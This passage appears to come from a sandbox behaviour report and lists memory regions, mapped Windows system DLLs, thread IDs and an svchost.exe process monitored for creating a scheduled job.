filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1799
start_va = 0x7ffc5e960000
end_va = 0x7ffc5eab5fff
monitored = 0
entry_point = 0x7ffc5e96a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1800
start_va = 0x7ffc5ec20000
end_va = 0x7ffc5ecc6fff
monitored = 0
entry_point = 0x7ffc5ec358d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1801
start_va = 0x7ffc5ecd0000
end_va = 0x7ffc5ed7cfff
monitored = 0
entry_point = 0x7ffc5ece81a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1802
start_va = 0x7ffc5f2c0000
end_va = 0x7ffc5f53cfff
monitored = 0
entry_point = 0x7ffc5f394970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1803
start_va = 0x7ffc5f540000
end_va = 0x7ffc5f6c5fff
monitored = 0
entry_point = 0x7ffc5f58ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1804
start_va = 0x7ffc5f760000
end_va = 0x7ffc5f806fff
monitored = 0
entry_point = 0x7ffc5f76b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1805
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1888
start_va = 0x1200000
end_va = 0x126efff
monitored = 0
entry_point = 0x12207c0
region_type = mapped_file
name = "services.exe"
filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe")
Region:
id = 1893
start_va = 0x1f00000
end_va = 0x204cfff
monitored = 0
entry_point = 0x1f43da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Thread:
id = 113
os_tid = 0xc04
Thread:
id = 114
os_tid = 0xc90
Thread:
id = 115
os_tid = 0x808
Thread:
id = 116
os_tid = 0x6ec
Thread:
id = 117
os_tid = 0x5ec
Thread:
id = 118
os_tid = 0xb54
Thread:
id = 119
os_tid = 0x4c8
Thread:
id = 120
os_tid = 0xcd0
Thread:
id = 121
os_tid = 0xc24
Thread:
id = 122
os_tid = 0xff0
Thread:
id = 123
os_tid = 0xf90
Thread:
id = 124
os_tid = 0xef4
Thread:
id = 125
os_tid = 0x470
Thread:
id = 126
os_tid = 0x468
Thread:
id = 127
os_tid = 0x440
Thread:
id = 128
os_tid = 0x43c
Thread:
id = 129
os_tid = 0x434
Thread:
id = 130
os_tid = 0x158
Thread:
id = 131
os_tid = 0x2f0
Thread:
id = 132
os_tid = 0x2cc
Thread:
id = 133
os_tid = 0x168
Thread:
id = 134
os_tid = 0x2d0
Thread:
id = 135
os_tid = 0x210
Thread:
id = 136
os_tid = 0x374
Process:
id = "7"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x73278000"
os_pid = "0x360"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "created_scheduled_job"
parent_id = "2"
os_parent_pid = "0x210"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000aea9" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1996
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1997
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1998
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1999
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2000
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2001
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2002
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2003
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2004
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2005
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2006
start_va = 0x7ff61f760000
end_va = 0x7ff61f76cfff
monitored = 0
entry_point = 0x7ff61f763980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 2007
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2124
start_va = 0x150000
end_va = 0x156fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 2125
start_va = 0x400000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2126
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2127
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2128
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2129
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2130
start_va = 0x500000
end_va = 0x5bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2131
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2132
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2133
start_va = 0x160000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2134
start_va = 0x7ff85d180000
end_va = 0x7ff85d273fff
monitored = 0
entry_point = 0x7ff85d18a960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 2135
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2136
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2137
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2138
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2139
start_va = 0x5c0000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 2140
start_va = 0x600000
end_va = 0x6fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 2141
start_va = 0x700000
end_va = 0x7dcfff
monitored = 0
entry_point = 0x75e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2142
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2143
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2144
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2145
start_va = 0x700000
end_va = 0x887fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 2146
start_va = 0x890000
end_va = 0xa10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000890000"
filename = ""
Region:
id = 2147
start_va = 0xa20000
end_va = 0xadffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a20000"
filename = ""
Region:
id = 2148
start_va = 0x100000
end_va = 0x101fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 2149
start_va = 0x110000
end_va = 0x110fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 2150
start_va = 0x120000
end_va = 0x120fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 2151
start_va = 0x130000
end_va = 0x130fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 2152
start_va = 0xae0000
end_va = 0xedafff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ae0000"
filename = ""
Region:
id = 2153
start_va = 0xee0000
end_va = 0x10b6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 2154
start_va = 0x10c0000
end_va = 0x12bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010c0000"
filename = ""
Region:
id = 2155
start_va = 0x1100000
end_va = 0x11fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001100000"
filename = ""
Region:
id = 2156
start_va = 0xee0000
end_va = 0xfdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 2157
start_va = 0x10b0000
end_va = 0x10b6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010b0000"
filename = ""
Region:
id = 2158
start_va = 0x7ff858e50000
end_va = 0x7ff858f9cfff
monitored = 0
entry_point = 0x7ff858e93da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 2159
start_va = 0x7ff85ca50000
end_va = 0x7ff85ca5bfff
monitored = 0
entry_point = 0x7ff85ca52480
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 2160
start_va = 0x7ff858e30000
end_va = 0x7ff858e47fff
monitored = 0
entry_point = 0x7ff858e35910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2161
start_va = 0x7ff858e20000
end_va = 0x7ff858e29fff
monitored = 0
entry_point = 0x7ff858e21660
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 2162
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2163
start_va = 0x1200000
end_va = 0x1342fff
monitored = 0
entry_point = 0x1228210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2164
start_va = 0x1200000
end_va = 0x1316fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 2165
start_va = 0x1320000
end_va = 0x151ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001320000"
filename = ""
Region:
id = 2166
start_va = 0x1400000
end_va = 0x14fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 2167
start_va = 0x1500000
end_va = 0x1836fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2168
start_va = 0x1200000
end_va = 0x12fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 2169
start_va = 0x1310000
end_va = 0x1316fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001310000"
filename = ""
Region:
id = 2170
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 2171
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2172
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2173
start_va = 0x7ff858a90000
end_va = 0x7ff858b4efff
monitored = 0
entry_point = 0x7ff858ab1c50
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 2174
start_va = 0x1840000
end_va = 0x193ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001840000"
filename = ""
Region:
id = 2175
start_va = 0x7ff85dcc0000
end_va = 0x7ff85dcecfff
monitored = 0
entry_point = 0x7ff85dcd9d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2176
start_va = 0x7ff8584c0000
end_va = 0x7ff858500fff
monitored = 0
entry_point = 0x7ff8584d7eb0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 2177
start_va = 0x7ff858510000
end_va = 0x7ff85860bfff
monitored = 0
entry_point = 0x7ff858546df0
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 2178
start_va = 0x7ff85de50000
end_va = 0x7ff85de68fff
monitored = 0
entry_point = 0x7ff85de55e10
region_type = mapped_file
name = "eventaggregation.dll"
filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")
Region:
id = 2179
start_va = 0x5c0000
end_va = 0x5d6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 2180
start_va = 0x1940000
end_va = 0x1b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 2181
start_va = 0x1a00000
end_va = 0x1afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 2182
start_va = 0x7ff85d280000
end_va = 0x7ff85d2c8fff
monitored = 0
entry_point = 0x7ff85d28a090
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 2183
start_va = 0x7ff85dfe0000
end_va = 0x7ff85e02afff
monitored = 0
entry_point = 0x7ff85dfe35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2184
start_va = 0x7ff8584a0000
end_va = 0x7ff8584b0fff
monitored = 0
entry_point = 0x7ff8584a3320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 2185
start_va = 0x1b00000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b00000"
filename = ""
Region:
id = 2186
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2187
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2188
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2189
start_va = 0xee0000
end_va = 0xf5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 2190
start_va = 0xf60000
end_va = 0x105ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f60000"
filename = ""
Region:
id = 2191
start_va = 0x1c00000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c00000"
filename = ""
Region:
id = 2192
start_va = 0x7ff858200000
end_va = 0x7ff85826dfff
monitored = 0
entry_point = 0x7ff858207f60
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 2193
start_va = 0x7ff8581b0000
end_va = 0x7ff8581f1fff
monitored = 0
entry_point = 0x7ff8581b27d0
region_type = mapped_file
name = "mstask.dll"
filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll")
Region:
id = 2194
start_va = 0x1f0000
end_va = 0x1f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2195
start_va = 0x1d00000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 2196
start_va = 0x7ff857ee0000
end_va = 0x7ff857fa7fff
monitored = 0
entry_point = 0x7ff857f213f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 2197
start_va = 0x7ff857fb0000
end_va = 0x7ff858010fff
monitored = 0
entry_point = 0x7ff857fb4b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 2198
start_va = 0x7ff858020000
end_va = 0x7ff85819bfff
monitored = 0
entry_point = 0x7ff858071650
region_type = mapped_file
name = "locationframework.dll"
filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")
Region:
id = 2199
start_va = 0x7ff8581a0000
end_va = 0x7ff8581aafff
monitored = 0
entry_point = 0x7ff8581a1770
region_type = mapped_file
name = "lfsvc.dll"
filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")
Region:
id = 2200
start_va = 0x7ff858b90000
end_va = 0x7ff858c21fff
monitored = 0
entry_point = 0x7ff858bda780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 2201
start_va = 0x7ff858d70000
end_va = 0x7ff858da5fff
monitored = 0
entry_point = 0x7ff858d80070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2202
start_va = 0x7ff85c890000
end_va = 0x7ff85c8cffff
monitored = 0
entry_point = 0x7ff85c8a1960
region_type = mapped_file
name = "brokerlib.dll"
filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")
Region:
id = 2203
start_va = 0x7ff85e030000
end_va = 0x7ff85e03ffff
monitored = 0
entry_point = 0x7ff85e0356e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2204
start_va = 0x7ff85ebf0000
end_va = 0x7ff85edb6fff
monitored = 0
entry_point = 0x7ff85ec4db80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2205
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2206
start_va = 0x7ff85fae0000
end_va = 0x7ff85fb4afff
monitored = 0
entry_point = 0x7ff85faf90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2207
start_va = 0x1320000
end_va = 0x13fcfff
monitored = 0
entry_point = 0x137e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2208
start_va = 0x7ff85d530000
end_va = 0x7ff85d560fff
monitored = 0
entry_point = 0x7ff85d537d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2209
start_va = 0x1e00000
end_va = 0x1efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e00000"
filename = ""
Region:
id = 2210
start_va = 0x1320000
end_va = 0x139ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001320000"
filename = ""
Region:
id = 2211
start_va = 0x1f00000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 2212
start_va = 0x1940000
end_va = 0x19bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001940000"
filename = ""
Region:
id = 2213
start_va = 0x7ff857ed0000
end_va = 0x7ff857edffff
monitored = 0
entry_point = 0x7ff857ed2c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 2214
start_va = 0x7ff857ea0000
end_va = 0x7ff857ecefff
monitored = 0
entry_point = 0x7ff857ea8910
region_type = mapped_file
name = "wptaskscheduler.dll"
filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")
Region:
id = 2215
start_va = 0x7ff857e90000
end_va = 0x7ff857e9cfff
monitored = 0
entry_point = 0x7ff857e92ca0
region_type = mapped_file
name = "csystemeventsbrokerclient.dll"
filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")
Region:
id = 2216
start_va = 0x2000000
end_va = 0x207ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 2217
start_va = 0x7ff85d910000
end_va = 0x7ff85d96bfff
monitored = 0
entry_point = 0x7ff85d926f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2218
start_va = 0x2080000
end_va = 0x217ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002080000"
filename = ""
Region:
id = 2219
start_va = 0x5c0000
end_va = 0x5c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 2220
start_va = 0x5d0000
end_va = 0x5d6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 2221
start_va = 0x7ff857e30000
end_va = 0x7ff857e84fff
monitored = 0
entry_point = 0x7ff857e3fc00
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 2222
start_va = 0x7ff85e040000
end_va = 0x7ff85e053fff
monitored = 0
entry_point = 0x7ff85e0452e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2223
start_va = 0x7ff85c6f0000
end_va = 0x7ff85c702fff
